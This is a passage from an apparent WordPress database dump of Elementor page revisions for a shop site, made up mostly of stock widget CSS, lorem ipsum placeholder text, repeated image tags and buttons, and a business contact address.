15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 10:57:57','2022-10-03 05:27:57','',1373,'https://gopalak.in/?p=1517',0,'revision','',0),(1518,1,'2022-10-03 10:57:57','2022-10-03 05:27:57','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It 